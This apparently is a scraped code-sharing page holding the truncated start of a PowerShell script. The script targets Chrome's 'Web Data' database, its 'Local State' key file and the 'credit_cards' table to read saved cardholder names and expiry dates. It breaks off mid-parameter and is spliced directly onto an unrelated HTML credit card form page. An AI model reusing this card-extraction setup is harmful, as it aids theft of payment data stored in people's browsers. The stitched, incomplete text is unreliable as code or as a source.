Skip to content

Instantly share code, notes, and snippets.

using namespace "System.Security.Cryptography"
param (
$DbPath = (Join-path ([environment]::GetFolderPath('UserProfile')) 'AppData\Local\Google\Chrome\User Data\Default\Web Data'),
$StatePath = 'C:\Users\Enes\AppData\Local\Google\Chrome\User Data\Local State',
$Table = "credit_cards" ,
$Property = @(@{n='Name'; e={$_.name_on_card}} ,
@{n='Exp_month';e={$_.expiration_month}},
@{n='Exp_year'; e={$_.expiration_year}},
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Credit card form</title>
<style>
body {
font-family: sans-serif;
margin: 0;
}